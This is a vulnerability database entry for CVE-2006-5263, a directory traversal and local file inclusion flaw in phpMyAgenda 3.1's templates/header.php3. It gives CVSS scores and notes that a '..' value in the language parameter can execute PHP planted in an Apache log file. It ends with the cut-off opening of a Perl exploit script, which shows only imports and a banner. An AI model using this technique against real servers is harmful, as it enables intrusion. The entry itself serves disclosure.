7.5
CVSSv2

CVE-2006-5263

Published: 12/10/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and previous versions allows remote malicious users to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.

Vulnerable Product Search on Vulmon Subscribe to Product

phpmyagenda phpmyagenda

Exploits

#!/usr/bin/perl use IO::Socket; use LWP::Simple; print "\n"; print "#################################################################\n"; print "# #\n"; print "# phpMyAgenda < 31 Multiple Remote Vulnerabilities Exploit #\n"; print "# Bug found By : Ashiyane Corporation ...